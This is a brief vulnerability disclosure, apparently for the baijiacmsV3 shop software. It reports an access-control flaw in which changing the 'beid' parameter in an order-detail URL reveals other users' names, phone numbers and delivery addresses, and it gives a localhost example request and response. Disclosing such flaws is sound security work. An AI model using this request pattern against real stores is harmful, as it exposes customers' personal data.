Information leakage caused by improper control of authority (“https://github.com/baijiacms/baijiacmsV3”)
The backstage interface needs to be added to a store,After the domain name is configured, visit the store home page.
There is a leak of information on the user's receipt address.
Example:"http://127.0.0.1/baijiacmsV3-master/index.php?mod=mobile&name=shopwap&do=myorder&op=detail&orderid=3&beid=2"
Response:{"message":{"id":"1","realname":"zhangsan","mobile":"13112345678","province":"\u5317\u4eac\u5e02","city":"\u5317\u4eac\u8f96\u533a","area":"\u4e1c\u57ce\u533a","address":"zhangsan_test"},"redirect":"","type":"ajax"}
Beid parameter values can be modified to see other user receiving addresses.
网友评论